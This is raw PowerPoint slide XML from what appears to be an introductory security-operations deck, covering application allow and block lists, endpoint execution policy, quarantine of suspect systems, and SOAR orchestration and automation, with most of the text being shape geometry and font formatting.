              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Block</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Lists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768220" y="7000113"/>
            <a:ext cx="12563475" cy="1098550"/>
            <a:chOff x="1768220" y="7000113"/>
            <a:chExt cx="12563475" cy="1098550"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1777745" y="7009638"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="12455398" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88646" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="1078991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398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777745" y="7009638"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88645"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="1078991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88645"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="4279A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4093590" y="7354316"/>
            <a:ext cx="790575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Quarantine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isolates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suspect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systems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analysis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sandbox.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81403" y="1806092"/>
            <a:ext cx="13493115" cy="22078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460490" marR="5080" indent="-6448425">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>endpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>determines</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3B4043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0">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>whether</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45">
                <a:solidFill>
                  <a:srgbClr val="3B4043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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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0">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>not.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3B4043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0">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3B4043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20">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>two </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-570">
                <a:solidFill>
                  <a:srgbClr val="3B4043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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>lists:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="403860">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Allow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Lists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150">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="735330" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="734695" algn="l"/>
                <a:tab pos="735330" algn="l"/>
              </a:tabLst>
            </a:pP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U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n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less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th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e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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>s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explic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i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tl</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>y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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>autho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r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ized,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d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e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>n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i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>s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its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ex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e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cutio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1050" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="10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2641" y="306451"/>
            <a:ext cx="903160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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Orchestration,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120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automation,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response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69007" y="760476"/>
            <a:ext cx="12528804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966466" y="3185922"/>
            <a:ext cx="10330180" cy="893444"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10330180" h="893445">
                <a:moveTo>
                  <a:pt x="0" y="73405"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5772" y="44844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21510" y="21510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44844" y="5772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73406" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10256266" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10284827" y="5772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10308161" y="21510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10323899" y="44844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10329672" y="73405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10329672" y="819657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10323899" y="848219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10308161" y="871553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10284827" y="887291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10256266" y="893063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73406" y="893063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44844" y="887291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21510" y="871553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5772" y="848219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="819657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="73405"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="427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57933" y="1882292"/>
            <a:ext cx="13140055" cy="1914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92150" marR="5080" indent="-680085">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Automation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is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action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scripting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single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activity,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while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orchestration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action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coordinating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multiple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automations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(and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possibly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manual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activity)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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>perform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complex,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multi-step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task.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400">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="389890">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SOAR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automates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enriches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workflows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drives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608444" y="4621148"/>
            <a:ext cx="3404235" cy="3036570"/>
            <a:chOff x="6608444" y="4621148"/>
            <a:chExt cx="3404235" cy="3036570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6617969" y="4630673"/>
              <a:ext cx="3017520" cy="3017520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3017520" h="3017520">
                  <a:moveTo>
                    <a:pt x="0" y="1508759"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="745" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575088" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508759" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016774" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3017520" y="1508759"/>
                  </a:lnTo>
                  <a:lnTo>
